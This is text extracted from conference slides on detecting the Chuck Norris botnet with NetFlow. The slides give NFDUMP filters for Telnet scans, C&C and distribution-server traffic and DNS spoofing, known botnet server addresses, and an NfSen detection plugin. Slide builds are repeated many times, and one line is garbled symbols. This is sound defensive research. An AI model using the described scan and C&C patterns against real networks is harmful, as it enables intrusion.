Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
